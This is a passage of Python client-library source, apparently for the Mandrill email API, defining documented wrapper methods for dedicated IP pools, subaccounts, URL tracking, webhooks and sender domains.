UnknownIPError: The provided dedicated IP does not exist.
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'ip': ip}
return self.master.call('ips/cancel-warmup', _params)
def set_pool(self, ip, pool, create_pool=False):
"""Moves a dedicated IP to a different pool.
Args:
ip (string): a dedicated ip address
pool (string): the name of the new pool to add the dedicated ip to
create_pool (boolean): whether to create the pool if it does not exist; if false and the pool does not exist, an Unknown_Pool will be thrown.
Returns:
struct. Information about the updated state of the dedicated IP::
ip (string): the ip address
created_at (string): the date and time that the dedicated IP was created as a UTC string in YYYY-MM-DD HH:MM:SS format
pool (string): the name of the pool that this dedicated IP belongs to
domain (string): the domain name (reverse dns) of this dedicated IP
custom_dns (struct): information about the ip's custom dns, if it has been configured::
custom_dns.enabled (boolean): a boolean indicating whether custom dns has been configured for this ip
custom_dns.valid (boolean): whether the ip's custom dns is currently valid
custom_dns.error (string): if the ip's custom dns is invalid, this will include details about the error
warmup (struct): information about the ip's warmup status::
warmup.warming_up (boolean): whether the ip is currently in warmup mode
warmup.start_at (string): the start time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format
warmup.end_at (string): the end date and time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format
Raises:
UnknownIPError: The provided dedicated IP does not exist.
UnknownPoolError: The provided dedicated IP pool does not exist.
InvalidKeyError: The provided API key is not a valid Mandrill API key
InvalidEmptyDefaultPoolError: You cannot remove the last IP from your default IP pool.
Error: A general Mandrill error has occurred
"""
_params = {'ip': ip, 'pool': pool, 'create_pool': create_pool}
return self.master.call('ips/set-pool', _params)
def delete(self, ip):
"""Deletes a dedicated IP. This is permanent and cannot be undone.
Args:
ip (string): the dedicated ip to remove from your account
Returns:
struct. a description of the ip that was removed from your account.::
ip (string): the ip address
deleted (string): a boolean indicating whether the ip was successfully deleted
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'ip': ip}
return self.master.call('ips/delete', _params)
def list_pools(self, ):
"""Lists your dedicated IP pools.
Returns:
array. the dedicated IP pools for your account, up to a maximum of 1,000::
[] (struct): information about each dedicated IP pool::
[].name (string): this pool's name
[].created_at (string): the date and time that this pool was created as a UTC timestamp in YYYY-MM-DD HH:MM:SS format
[].ips (array): the dedicated IPs in this pool::
[].ips[] (struct): information about each dedicated IP::
[].ips[].ip (string): the ip address
[].ips[].created_at (string): the date and time that the dedicated IP was created as a UTC string in YYYY-MM-DD HH:MM:SS format
[].ips[].pool (string): the name of the pool that this dedicated IP belongs to
[].ips[].domain (string): the domain name (reverse dns) of this dedicated IP
[].ips[].custom_dns (struct): information about the ip's custom dns, if it has been configured::
[].ips[].custom_dns.enabled (boolean): a boolean indicating whether custom dns has been configured for this ip
[].ips[].custom_dns.valid (boolean): whether the ip's custom dns is currently valid
[].ips[].custom_dns.error (string): if the ip's custom dns is invalid, this will include details about the error
[].ips[].warmup (struct): information about the ip's warmup status::
[].ips[].warmup.warming_up (boolean): whether the ip is currently in warmup mode
[].ips[].warmup.start_at (string): the start time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format
[].ips[].warmup.end_at (string): the end date and time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {}
return self.master.call('ips/list-pools', _params)
def pool_info(self, pool):
"""Describes a single dedicated IP pool.
Args:
pool (string): a pool name
Returns:
struct. Information about the dedicated ip pool::
name (string): this pool's name
created_at (string): the date and time that this pool was created as a UTC timestamp in YYYY-MM-DD HH:MM:SS format
ips (array): the dedicated IPs in this pool::
ips[] (struct): information about each dedicated IP::
ips[].ip (string): the ip address
ips[].created_at (string): the date and time that the dedicated IP was created as a UTC string in YYYY-MM-DD HH:MM:SS format
ips[].pool (string): the name of the pool that this dedicated IP belongs to
ips[].domain (string): the domain name (reverse dns) of this dedicated IP
ips[].custom_dns (struct): information about the ip's custom dns, if it has been configured::
ips[].custom_dns.enabled (boolean): a boolean indicating whether custom dns has been configured for this ip
ips[].custom_dns.valid (boolean): whether the ip's custom dns is currently valid
ips[].custom_dns.error (string): if the ip's custom dns is invalid, this will include details about the error
ips[].warmup (struct): information about the ip's warmup status::
ips[].warmup.warming_up (boolean): whether the ip is currently in warmup mode
ips[].warmup.start_at (string): the start time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format
ips[].warmup.end_at (string): the end date and time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format
Raises:
UnknownPoolError: The provided dedicated IP pool does not exist.
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'pool': pool}
return self.master.call('ips/pool-info', _params)
def create_pool(self, pool):
"""Creates a pool and returns it. If a pool already exists with this
name, no action will be performed.
Args:
pool (string): the name of a pool to create
Returns:
struct. Information about the dedicated ip pool::
name (string): this pool's name
created_at (string): the date and time that this pool was created as a UTC timestamp in YYYY-MM-DD HH:MM:SS format
ips (array): the dedicated IPs in this pool::
ips[] (struct): information about each dedicated IP::
ips[].ip (string): the ip address
ips[].created_at (string): the date and time that the dedicated IP was created as a UTC string in YYYY-MM-DD HH:MM:SS format
ips[].pool (string): the name of the pool that this dedicated IP belongs to
ips[].domain (string): the domain name (reverse dns) of this dedicated IP
ips[].custom_dns (struct): information about the ip's custom dns, if it has been configured::
ips[].custom_dns.enabled (boolean): a boolean indicating whether custom dns has been configured for this ip
ips[].custom_dns.valid (boolean): whether the ip's custom dns is currently valid
ips[].custom_dns.error (string): if the ip's custom dns is invalid, this will include details about the error
ips[].warmup (struct): information about the ip's warmup status::
ips[].warmup.warming_up (boolean): whether the ip is currently in warmup mode
ips[].warmup.start_at (string): the start time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format
ips[].warmup.end_at (string): the end date and time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'pool': pool}
return self.master.call('ips/create-pool', _params)
def delete_pool(self, pool):
"""Deletes a pool. A pool must be empty before you can delete it, and you cannot delete your default pool.
Args:
pool (string): the name of the pool to delete
Returns:
struct. information about the status of the pool that was deleted::
pool (string): the name of the pool
deleted (boolean): whether the pool was deleted
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownPoolError: The provided dedicated IP pool does not exist.
InvalidDeleteDefaultPoolError: The default pool cannot be deleted.
InvalidDeleteNonEmptyPoolError: Non-empty pools cannot be deleted.
Error: A general Mandrill error has occurred
"""
_params = {'pool': pool}
return self.master.call('ips/delete-pool', _params)
def check_custom_dns(self, ip, domain):
"""Tests whether a domain name is valid for use as the custom reverse
DNS for a dedicated IP.
Args:
ip (string): a dedicated ip address
domain (string): the domain name to test
Returns:
struct. validation results for the domain::
valid (string): whether the domain name has a correctly-configured A record pointing to the ip address
error (string): if valid is false, this will contain details about why the domain's A record is incorrect
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownIPError: The provided dedicated IP does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'ip': ip, 'domain': domain}
return self.master.call('ips/check-custom-dns', _params)
def set_custom_dns(self, ip, domain):
"""Configures the custom DNS name for a dedicated IP.
Args:
ip (string): a dedicated ip address
domain (string): a domain name to set as the dedicated IP's custom dns name.
Returns:
struct. information about the dedicated IP's new configuration::
ip (string): the ip address
created_at (string): the date and time that the dedicated IP was created as a UTC string in YYYY-MM-DD HH:MM:SS format
pool (string): the name of the pool that this dedicated IP belongs to
domain (string): the domain name (reverse dns) of this dedicated IP
custom_dns (struct): information about the ip's custom dns, if it has been configured::
custom_dns.enabled (boolean): a boolean indicating whether custom dns has been configured for this ip
custom_dns.valid (boolean): whether the ip's custom dns is currently valid
custom_dns.error (string): if the ip's custom dns is invalid, this will include details about the error
warmup (struct): information about the ip's warmup status::
warmup.warming_up (boolean): whether the ip is currently in warmup mode
warmup.start_at (string): the start time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format
warmup.end_at (string): the end date and time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownIPError: The provided dedicated IP does not exist.
InvalidCustomDNSError: The domain name is not configured for use as the dedicated IP's custom reverse DNS.
InvalidCustomDNSPendingError: A custom DNS change for this dedicated IP is currently pending.
Error: A general Mandrill error has occurred
"""
_params = {'ip': ip, 'domain': domain}
return self.master.call('ips/set-custom-dns', _params)
class Internal(object):
def __init__(self, master):
self.master = master
class Subaccounts(object):
def __init__(self, master):
self.master = master
def list(self, q=None):
"""Get the list of subaccounts defined for the account, optionally filtered by a prefix
Args:
q (string): an optional prefix to filter the subaccounts' ids and names
Returns:
array. the subaccounts for the account, up to a maximum of 1,000::
[] (struct): the individual subaccount info::
[].id (string): a unique indentifier for the subaccount
[].name (string): an optional display name for the subaccount
[].custom_quota (integer): an optional manual hourly quota for the subaccount. If not specified, the hourly quota will be managed based on reputation
[].status (string): the current sending status of the subaccount, one of "active" or "paused"
[].reputation (integer): the subaccount's current reputation on a scale from 0 to 100
[].created_at (string): the date and time that the subaccount was created as a UTC string in YYYY-MM-DD HH:MM:SS format
[].first_sent_at (string): the date and time that the subaccount first sent as a UTC string in YYYY-MM-DD HH:MM:SS format
[].sent_weekly (integer): the number of emails the subaccount has sent so far this week (weeks start on midnight Monday, UTC)
[].sent_monthly (integer): the number of emails the subaccount has sent so far this month (months start on midnight of the 1st, UTC)
[].sent_total (integer): the number of emails the subaccount has sent since it was created
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'q': q}
return self.master.call('subaccounts/list', _params)
def add(self, id, name=None, notes=None, custom_quota=None):
"""Add a new subaccount
Args:
id (string): a unique identifier for the subaccount to be used in sending calls
name (string): an optional display name to further identify the subaccount
notes (string): optional extra text to associate with the subaccount
custom_quota (integer): an optional manual hourly quota for the subaccount. If not specified, Mandrill will manage this based on reputation
Returns:
struct. the information saved about the new subaccount::
id (string): a unique indentifier for the subaccount
name (string): an optional display name for the subaccount
custom_quota (integer): an optional manual hourly quota for the subaccount. If not specified, the hourly quota will be managed based on reputation
status (string): the current sending status of the subaccount, one of "active" or "paused"
reputation (integer): the subaccount's current reputation on a scale from 0 to 100
created_at (string): the date and time that the subaccount was created as a UTC string in YYYY-MM-DD HH:MM:SS format
first_sent_at (string): the date and time that the subaccount first sent as a UTC string in YYYY-MM-DD HH:MM:SS format
sent_weekly (integer): the number of emails the subaccount has sent so far this week (weeks start on midnight Monday, UTC)
sent_monthly (integer): the number of emails the subaccount has sent so far this month (months start on midnight of the 1st, UTC)
sent_total (integer): the number of emails the subaccount has sent since it was created
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'id': id, 'name': name, 'notes': notes, 'custom_quota': custom_quota}
return self.master.call('subaccounts/add', _params)
def info(self, id):
"""Given the ID of an existing subaccount, return the data about it
Args:
id (string): the unique identifier of the subaccount to query
Returns:
struct. the information about the subaccount::
id (string): a unique indentifier for the subaccount
name (string): an optional display name for the subaccount
notes (string): optional extra text to associate with the subaccount
custom_quota (integer): an optional manual hourly quota for the subaccount. If not specified, the hourly quota will be managed based on reputation
status (string): the current sending status of the subaccount, one of "active" or "paused"
reputation (integer): the subaccount's current reputation on a scale from 0 to 100
created_at (string): the date and time that the subaccount was created as a UTC string in YYYY-MM-DD HH:MM:SS format
first_sent_at (string): the date and time that the subaccount first sent as a UTC string in YYYY-MM-DD HH:MM:SS format
sent_weekly (integer): the number of emails the subaccount has sent so far this week (weeks start on midnight Monday, UTC)
sent_monthly (integer): the number of emails the subaccount has sent so far this month (months start on midnight of the 1st, UTC)
sent_total (integer): the number of emails the subaccount has sent since it was created
sent_hourly (integer): the number of emails the subaccount has sent in the last hour
hourly_quota (integer): the current hourly quota for the subaccount, either manual or reputation-based
last_30_days (struct): stats for this subaccount in the last 30 days::
last_30_days.sent (integer): the number of emails sent for this subaccount in the last 30 days
last_30_days.hard_bounces (integer): the number of emails hard bounced for this subaccount in the last 30 days
last_30_days.soft_bounces (integer): the number of emails soft bounced for this subaccount in the last 30 days
last_30_days.rejects (integer): the number of emails rejected for sending this subaccount in the last 30 days
last_30_days.complaints (integer): the number of spam complaints for this subaccount in the last 30 days
last_30_days.unsubs (integer): the number of unsbuscribes for this subaccount in the last 30 days
last_30_days.opens (integer): the number of times emails have been opened for this subaccount in the last 30 days
last_30_days.unique_opens (integer): the number of unique opens for emails sent for this subaccount in the last 30 days
last_30_days.clicks (integer): the number of URLs that have been clicked for this subaccount in the last 30 days
last_30_days.unique_clicks (integer): the number of unique clicks for emails sent for this subaccount in the last 30 days
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownSubaccountError: The provided subaccount id does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'id': id}
return self.master.call('subaccounts/info', _params)
def update(self, id, name=None, notes=None, custom_quota=None):
"""Update an existing subaccount
Args:
id (string): the unique identifier of the subaccount to update
name (string): an optional display name to further identify the subaccount
notes (string): optional extra text to associate with the subaccount
custom_quota (integer): an optional manual hourly quota for the subaccount. If not specified, Mandrill will manage this based on reputation
Returns:
struct. the information for the updated subaccount::
id (string): a unique indentifier for the subaccount
name (string): an optional display name for the subaccount
custom_quota (integer): an optional manual hourly quota for the subaccount. If not specified, the hourly quota will be managed based on reputation
status (string): the current sending status of the subaccount, one of "active" or "paused"
reputation (integer): the subaccount's current reputation on a scale from 0 to 100
created_at (string): the date and time that the subaccount was created as a UTC string in YYYY-MM-DD HH:MM:SS format
first_sent_at (string): the date and time that the subaccount first sent as a UTC string in YYYY-MM-DD HH:MM:SS format
sent_weekly (integer): the number of emails the subaccount has sent so far this week (weeks start on midnight Monday, UTC)
sent_monthly (integer): the number of emails the subaccount has sent so far this month (months start on midnight of the 1st, UTC)
sent_total (integer): the number of emails the subaccount has sent since it was created
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownSubaccountError: The provided subaccount id does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'id': id, 'name': name, 'notes': notes, 'custom_quota': custom_quota}
return self.master.call('subaccounts/update', _params)
def delete(self, id):
"""Delete an existing subaccount. Any email related to the subaccount will be saved, but stats will be removed and any future sending calls to this subaccount will fail.
Args:
id (string): the unique identifier of the subaccount to delete
Returns:
struct. the information for the deleted subaccount::
id (string): a unique indentifier for the subaccount
name (string): an optional display name for the subaccount
custom_quota (integer): an optional manual hourly quota for the subaccount. If not specified, the hourly quota will be managed based on reputation
status (string): the current sending status of the subaccount, one of "active" or "paused"
reputation (integer): the subaccount's current reputation on a scale from 0 to 100
created_at (string): the date and time that the subaccount was created as a UTC string in YYYY-MM-DD HH:MM:SS format
first_sent_at (string): the date and time that the subaccount first sent as a UTC string in YYYY-MM-DD HH:MM:SS format
sent_weekly (integer): the number of emails the subaccount has sent so far this week (weeks start on midnight Monday, UTC)
sent_monthly (integer): the number of emails the subaccount has sent so far this month (months start on midnight of the 1st, UTC)
sent_total (integer): the number of emails the subaccount has sent since it was created
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownSubaccountError: The provided subaccount id does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'id': id}
return self.master.call('subaccounts/delete', _params)
def pause(self, id):
"""Pause a subaccount's sending. Any future emails delivered to this subaccount will be queued for a maximum of 3 days until the subaccount is resumed.
Args:
id (string): the unique identifier of the subaccount to pause
Returns:
struct. the information for the paused subaccount::
id (string): a unique indentifier for the subaccount
name (string): an optional display name for the subaccount
custom_quota (integer): an optional manual hourly quota for the subaccount. If not specified, the hourly quota will be managed based on reputation
status (string): the current sending status of the subaccount, one of "active" or "paused"
reputation (integer): the subaccount's current reputation on a scale from 0 to 100
created_at (string): the date and time that the subaccount was created as a UTC string in YYYY-MM-DD HH:MM:SS format
first_sent_at (string): the date and time that the subaccount first sent as a UTC string in YYYY-MM-DD HH:MM:SS format
sent_weekly (integer): the number of emails the subaccount has sent so far this week (weeks start on midnight Monday, UTC)
sent_monthly (integer): the number of emails the subaccount has sent so far this month (months start on midnight of the 1st, UTC)
sent_total (integer): the number of emails the subaccount has sent since it was created
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownSubaccountError: The provided subaccount id does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'id': id}
return self.master.call('subaccounts/pause', _params)
def resume(self, id):
"""Resume a paused subaccount's sending
Args:
id (string): the unique identifier of the subaccount to resume
Returns:
struct. the information for the resumed subaccount::
id (string): a unique indentifier for the subaccount
name (string): an optional display name for the subaccount
custom_quota (integer): an optional manual hourly quota for the subaccount. If not specified, the hourly quota will be managed based on reputation
status (string): the current sending status of the subaccount, one of "active" or "paused"
reputation (integer): the subaccount's current reputation on a scale from 0 to 100
created_at (string): the date and time that the subaccount was created as a UTC string in YYYY-MM-DD HH:MM:SS format
first_sent_at (string): the date and time that the subaccount first sent as a UTC string in YYYY-MM-DD HH:MM:SS format
sent_weekly (integer): the number of emails the subaccount has sent so far this week (weeks start on midnight Monday, UTC)
sent_monthly (integer): the number of emails the subaccount has sent so far this month (months start on midnight of the 1st, UTC)
sent_total (integer): the number of emails the subaccount has sent since it was created
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownSubaccountError: The provided subaccount id does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'id': id}
return self.master.call('subaccounts/resume', _params)
class Urls(object):
def __init__(self, master):
self.master = master
def list(self, ):
"""Get the 100 most clicked URLs
Returns:
array. the 100 most clicked URLs and their stats::
[] (struct): the individual URL stats::
[].url (string): the URL to be tracked
[].sent (integer): the number of emails that contained the URL
[].clicks (integer): the number of times the URL has been clicked from a tracked email
[].unique_clicks (integer): the number of unique emails that have generated clicks for this URL
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {}
return self.master.call('urls/list', _params)
def search(self, q):
"""Return the 100 most clicked URLs that match the search query given
Args:
q (string): a search query
Returns:
array. the 100 most clicked URLs matching the search query::
[] (struct): the URL matching the query::
[].url (string): the URL to be tracked
[].sent (integer): the number of emails that contained the URL
[].clicks (integer): the number of times the URL has been clicked from a tracked email
[].unique_clicks (integer): the number of unique emails that have generated clicks for this URL
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'q': q}
return self.master.call('urls/search', _params)
def time_series(self, url):
"""Return the recent history (hourly stats for the last 30 days) for a url
Args:
url (string): an existing URL
Returns:
array. the array of history information::
[] (struct): the information for a single hour::
[].time (string): the hour as a UTC date string in YYYY-MM-DD HH:MM:SS format
[].sent (integer): the number of emails that were sent with the URL during the hour
[].clicks (integer): the number of times the URL was clicked during the hour
[].unique_clicks (integer): the number of unique clicks generated for emails sent with this URL during the hour
Raises:
UnknownUrlError: The requested URL has not been seen in a tracked link
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'url': url}
return self.master.call('urls/time-series', _params)
def tracking_domains(self, ):
"""Get the list of tracking domains set up for this account
Returns:
array. the tracking domains and their status::
[] (struct): the individual tracking domain::
[].domain (string): the tracking domain name
[].created_at (string): the date and time that the tracking domain was added as a UTC string in YYYY-MM-DD HH:MM:SS format
[].last_tested_at (string): when the domain's DNS settings were last tested as a UTC string in YYYY-MM-DD HH:MM:SS format
[].cname (struct): details about the domain's CNAME record::
[].cname.valid (boolean): whether the domain's CNAME record is valid for use with Mandrill
[].cname.valid_after (string): when the domain's CNAME record will be considered valid for use with Mandrill as a UTC string in YYYY-MM-DD HH:MM:SS format. If set, this indicates that the record is valid now, but was previously invalid, and Mandrill will wait until the record's TTL elapses to start using it.
[].cname.error (string): an error describing the CNAME record, or null if the record is correct
[].valid_tracking (boolean): whether this domain can be used as a tracking domain for email.
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {}
return self.master.call('urls/tracking-domains', _params)
def add_tracking_domain(self, domain):
"""Add a tracking domain to your account
Args:
domain (string): a domain name
Returns:
struct. information about the domain::
domain (string): the tracking domain name
created_at (string): the date and time that the tracking domain was added as a UTC string in YYYY-MM-DD HH:MM:SS format
last_tested_at (string): when the domain's DNS settings were last tested as a UTC string in YYYY-MM-DD HH:MM:SS format
cname (struct): details about the domain's CNAME record::
cname.valid (boolean): whether the domain's CNAME record is valid for use with Mandrill
cname.valid_after (string): when the domain's CNAME record will be considered valid for use with Mandrill as a UTC string in YYYY-MM-DD HH:MM:SS format. If set, this indicates that the record is valid now, but was previously invalid, and Mandrill will wait until the record's TTL elapses to start using it.
cname.error (string): an error describing the CNAME record, or null if the record is correct
valid_tracking (boolean): whether this domain can be used as a tracking domain for email.
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'domain': domain}
return self.master.call('urls/add-tracking-domain', _params)
def check_tracking_domain(self, domain):
"""Checks the CNAME settings for a tracking domain. The domain must have been added already with the add-tracking-domain call
Args:
domain (string): an existing tracking domain name
Returns:
struct. information about the tracking domain::
domain (string): the tracking domain name
created_at (string): the date and time that the tracking domain was added as a UTC string in YYYY-MM-DD HH:MM:SS format
last_tested_at (string): when the domain's DNS settings were last tested as a UTC string in YYYY-MM-DD HH:MM:SS format
cname (struct): details about the domain's CNAME record::
cname.valid (boolean): whether the domain's CNAME record is valid for use with Mandrill
cname.valid_after (string): when the domain's CNAME record will be considered valid for use with Mandrill as a UTC string in YYYY-MM-DD HH:MM:SS format. If set, this indicates that the record is valid now, but was previously invalid, and Mandrill will wait until the record's TTL elapses to start using it.
cname.error (string): an error describing the CNAME record, or null if the record is correct
valid_tracking (boolean): whether this domain can be used as a tracking domain for email.
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownTrackingDomainError: The provided tracking domain does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'domain': domain}
return self.master.call('urls/check-tracking-domain', _params)
class Webhooks(object):
def __init__(self, master):
self.master = master
def list(self, ):
"""Get the list of all webhooks defined on the account
Returns:
array. the webhooks associated with the account::
[] (struct): the individual webhook info::
[].id (integer): a unique integer indentifier for the webhook
[].url (string): The URL that the event data will be posted to
[].description (string): a description of the webhook
[].auth_key (string): the key used to requests for this webhook
[].events (array): The message events that will be posted to the hook::
[].events[] (string): the individual message event (send, hard_bounce, soft_bounce, open, click, spam, unsub, or reject)
[].created_at (string): the date and time that the webhook was created as a UTC string in YYYY-MM-DD HH:MM:SS format
[].last_sent_at (string): the date and time that the webhook last successfully received events as a UTC string in YYYY-MM-DD HH:MM:SS format
[].batches_sent (integer): the number of event batches that have ever been sent to this webhook
[].events_sent (integer): the total number of events that have ever been sent to this webhook
[].last_error (string): if we've ever gotten an error trying to post to this webhook, the last error that we've seen
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {}
return self.master.call('webhooks/list', _params)
def add(self, url, description=None, events=[]):
"""Add a new webhook
Args:
url (string): the URL to POST batches of events
description (string): an optional description of the webhook
events (array): an optional list of events that will be posted to the webhook::
events[] (string): the individual event to listen for
Returns:
struct. the information saved about the new webhook::
id (integer): a unique integer indentifier for the webhook
url (string): The URL that the event data will be posted to
description (string): a description of the webhook
auth_key (string): the key used to requests for this webhook
events (array): The message events that will be posted to the hook::
events[] (string): the individual message event (send, hard_bounce, soft_bounce, open, click, spam, unsub, or reject)
created_at (string): the date and time that the webhook was created as a UTC string in YYYY-MM-DD HH:MM:SS format
last_sent_at (string): the date and time that the webhook last successfully received events as a UTC string in YYYY-MM-DD HH:MM:SS format
batches_sent (integer): the number of event batches that have ever been sent to this webhook
events_sent (integer): the total number of events that have ever been sent to this webhook
last_error (string): if we've ever gotten an error trying to post to this webhook, the last error that we've seen
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'url': url, 'description': description, 'events': events}
return self.master.call('webhooks/add', _params)
def info(self, id):
"""Given the ID of an existing webhook, return the data about it
Args:
id (integer): the unique identifier of a webhook belonging to this account
Returns:
struct. the information about the webhook::
id (integer): a unique integer indentifier for the webhook
url (string): The URL that the event data will be posted to
description (string): a description of the webhook
auth_key (string): the key used to requests for this webhook
events (array): The message events that will be posted to the hook::
events[] (string): the individual message event (send, hard_bounce, soft_bounce, open, click, spam, unsub, or reject)
created_at (string): the date and time that the webhook was created as a UTC string in YYYY-MM-DD HH:MM:SS format
last_sent_at (string): the date and time that the webhook last successfully received events as a UTC string in YYYY-MM-DD HH:MM:SS format
batches_sent (integer): the number of event batches that have ever been sent to this webhook
events_sent (integer): the total number of events that have ever been sent to this webhook
last_error (string): if we've ever gotten an error trying to post to this webhook, the last error that we've seen
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownWebhookError: The requested webhook does not exist
Error: A general Mandrill error has occurred
"""
_params = {'id': id}
return self.master.call('webhooks/info', _params)
def update(self, id, url, description=None, events=[]):
"""Update an existing webhook
Args:
id (integer): the unique identifier of a webhook belonging to this account
url (string): the URL to POST batches of events
description (string): an optional description of the webhook
events (array): an optional list of events that will be posted to the webhook::
events[] (string): the individual event to listen for
Returns:
struct. the information for the updated webhook::
id (integer): a unique integer indentifier for the webhook
url (string): The URL that the event data will be posted to
description (string): a description of the webhook
auth_key (string): the key used to requests for this webhook
events (array): The message events that will be posted to the hook::
events[] (string): the individual message event (send, hard_bounce, soft_bounce, open, click, spam, unsub, or reject)
created_at (string): the date and time that the webhook was created as a UTC string in YYYY-MM-DD HH:MM:SS format
last_sent_at (string): the date and time that the webhook last successfully received events as a UTC string in YYYY-MM-DD HH:MM:SS format
batches_sent (integer): the number of event batches that have ever been sent to this webhook
events_sent (integer): the total number of events that have ever been sent to this webhook
last_error (string): if we've ever gotten an error trying to post to this webhook, the last error that we've seen
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownWebhookError: The requested webhook does not exist
Error: A general Mandrill error has occurred
"""
_params = {'id': id, 'url': url, 'description': description, 'events': events}
return self.master.call('webhooks/update', _params)
def delete(self, id):
"""Delete an existing webhook
Args:
id (integer): the unique identifier of a webhook belonging to this account
Returns:
struct. the information for the deleted webhook::
id (integer): a unique integer indentifier for the webhook
url (string): The URL that the event data will be posted to
description (string): a description of the webhook
auth_key (string): the key used to requests for this webhook
events (array): The message events that will be posted to the hook::
events[] (string): the individual message event (send, hard_bounce, soft_bounce, open, click, spam, unsub, or reject)
created_at (string): the date and time that the webhook was created as a UTC string in YYYY-MM-DD HH:MM:SS format
last_sent_at (string): the date and time that the webhook last successfully received events as a UTC string in YYYY-MM-DD HH:MM:SS format
batches_sent (integer): the number of event batches that have ever been sent to this webhook
events_sent (integer): the total number of events that have ever been sent to this webhook
last_error (string): if we've ever gotten an error trying to post to this webhook, the last error that we've seen
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownWebhookError: The requested webhook does not exist
Error: A general Mandrill error has occurred
"""
_params = {'id': id}
return self.master.call('webhooks/delete', _params)
class Senders(object):
def __init__(self, master):
self.master = master
def list(self, ):
"""Return the senders that have tried to use this account.
Returns:
array. an array of sender data, one for each sending addresses used by the account::
[] (struct): the information on each sending address in the account::
[].address (string): the sender's email address
[].created_at (string): the date and time that the sender was first seen by Mandrill as a UTC date string in YYYY-MM-DD HH:MM:SS format
[].sent (integer): the total number of messages sent by this sender
[].hard_bounces (integer): the total number of hard bounces by messages by this sender
[].soft_bounces (integer): the total number of soft bounces by messages by this sender
[].rejects (integer): the total number of rejected messages by this sender
[].complaints (integer): the total number of spam complaints received for messages by this sender
[].unsubs (integer): the total number of unsubscribe requests received for messages by this sender
[].opens (integer): the total number of times messages by this sender have been opened
[].clicks (integer): the total number of times tracked URLs in messages by this sender have been clicked
[].unique_opens (integer): the number of unique opens for emails sent for this sender
[].unique_clicks (integer): the number of unique clicks for emails sent for this sender
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {}
return self.master.call('senders/list', _params)
def domains(self, ):
"""Returns the sender domains that have been added to this account.
Returns:
array. an array of sender domain data, one for each sending domain used by the account::
[] (struct): the information on each sending domain for the account::
[].domain (string): the sender domain name
[].created_at (string): the date and time that the sending domain was first seen as a UTC string in YYYY-MM-DD HH:MM:SS format
[].last_tested_at (string): when the domain's DNS settings were last tested as a UTC string in YYYY-MM-DD HH:MM:SS format
[].spf (struct): details about the domain's SPF record::
[].spf.valid (boolean): whether the domain's SPF record is valid for use with Mandrill
[].spf.valid_after (string): when the domain's SPF record will be considered valid for use with Mandrill as a UTC string in YYYY-MM-DD HH:MM:SS format. If set, this indicates that the record is valid now, but was previously invalid, and Mandrill will wait until the record's TTL elapses to start using it.
[].spf.error (string): an error describing the spf record, or null if the record is correct
[].dkim (struct): details about the domain's DKIM record::
[].dkim.valid (boolean): whether the domain's DKIM record is valid for use with Mandrill
[].dkim.valid_after (string): when the domain's DKIM record will be considered valid for use with Mandrill as a UTC string in YYYY-MM-DD HH:MM:SS format. If set, this indicates that the record is valid now, but was previously invalid, and Mandrill will wait until the record's TTL elapses to start using it.
[].dkim.error (string): an error describing the DKIM record, or null if the record is correct
[].verified_at (string): if the domain has been verified, this indicates when that verification occurred as a UTC string in YYYY-MM-DD HH:MM:SS format
[].valid_signing (boolean): whether this domain can be used to authenticate mail, either for itself or as a custom signing domain. If this is false but spf and dkim are both valid, you will need to verify the domain before using it to authenticate mail
Raises:
